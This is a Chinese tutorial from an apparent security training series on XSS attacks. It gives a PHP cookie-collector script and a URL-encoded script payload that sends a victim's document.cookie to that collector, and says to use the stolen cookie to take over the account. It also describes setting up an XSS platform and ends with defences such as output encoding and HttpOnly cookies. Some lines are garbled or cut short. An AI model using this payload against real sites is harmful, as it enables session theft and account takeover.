前言:
当前兄弟们对“nginx过滤cookie”都比较珍视,兄弟们都需要了解一些“nginx过滤cookie”的相关知识。那么小编同时在网上搜集了一些对于“nginx过滤cookie””的相关内容,希望小伙伴们能喜欢,我们快快来了解一下吧!文章来源:知了汇智冯老师
今天是《web安全-XSS攻击》系列的最后一篇啦,希望大家好好学习哦~
XSS之
知了汇智-禁卫实验室(GoDun.F)
1. 编写获取cookie的代码cookie.php,并将其放在一个web服务器上。
内容如下:
<?php
$cookie=$_GET['cookie'];
file_put_contents('cookie.txt',$cookie);
?>
2. 构造如下URL,并发送给被攻击者:
原始URL:
<script>doument.location=';+document.cookie;</script>
需要进行URL编码:
%3Cscript%3Edocument.location%3D%27http%3A%2f%2f127.0.0.1%2fcookie.php%3Fcookie%3D%27%2bdocument.cookie%3B%3C%2fscript%3E#
3. 受害者点击URL,会跳转到,并将cookie写入到了同目录下的cookie.txt中:
4. cookie.txt文件保存了受害者的cookie
5.最后攻击者利用获取到的cookie修改本地的cookie,登录到受害者的账户
试平台部署及应用
知了汇智-禁卫实验室(GoDun.F)
0 XSS测试平台介绍
XSS测试平台是测试XSS漏洞获取cookie并接收Web页面的平台,XSS可以做JS能做的所有事,包括但不限于窃取cookie、后台增删改文章、钓鱼、利用XSS漏洞进行传播、修改网页代码、网站重定向、获取用户信息等。
1 线上可用的XSS平台
2 自构XSS平台
A:找到Sql注入的开源平台,复制源代然后将其粘贴到网站的目录中
B:创建“xssplatform”的数据库
C:选择XSS平台数据库,导入源码包中的xssplatform.sql文件
D:执行如下SQL命令,将数据库中原有URL地址修改为自己的URL
UPDATE oc_module SET code=REPLACE(code,';,';)
E:将authtest.php中的网址替换为自己的URL
F:注册帐号。
将config.php中的invite改为normal,即为开放注册
在phpMyAdmin中选择oc_user,将注册用过的adminLevel值改为1
配置伪静态文件.htaccess,在平台跟目录下创建.htaccess文件,根据中间件类型写入代码
Nginx:
访问,然后注册,注册成功后将config.php中的改回invite,即关闭开放注册功能
G: 访问登录
3 XSS测试平台窃取用户信息实战
XSS的防御
知了汇智-禁卫实验室(GoDun.F)
0 XSS的防御
XSS防御的总体思路是:对用户的输入(和URL参数)进行过滤,对输出进行html编码。也就是对用户提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。
对输入的内容进行过滤,可以分为黑名单过滤和白名单过滤。黑名单过滤虽然可以拦截大部分的XSS攻击,但是还是存在被绕过的风险。白名单过滤虽然可以基本杜绝XSS攻击,但是真实环境中一般是不能进行如此严格的白名单过滤的。
对输出进行html编码,就是通过函数,将用户的输入的数据进行html编码,使其不能作为脚本运行。
如下,是使用php中的htmlspecialchars函数对用户输入的name参数进行html编码,将其转换为html实体
#使用htmlspecialchars函数对用户输入的name参数进行html编码,将其转换为html实体
$name = htmlspecialchars( $_GET[ 'name' ] );
如下,图一是没有进行html编码的,图2是进行了html编码的。经过html编码后script标签被当成了html实体
我们还可以服务端设置会话Cookie的HTTP Only属性,这样,客户端的JS脚本就不能获取Cookie信息了
1 修复总结
因为XSS漏洞涉及输入和输出两部分,所以其修复也分两种
A:过滤输入的数据,包括” ‘ ”,” “ ”,”<”,”>” “on*”等非法字符。
B:对输出到页面的数据进行相应的编码转换,包括HTML实体编码、JavaScript编码等。
本次关于XSS攻击的课程就结束啦,谢谢大家关注。
标签: #nginx过滤cookie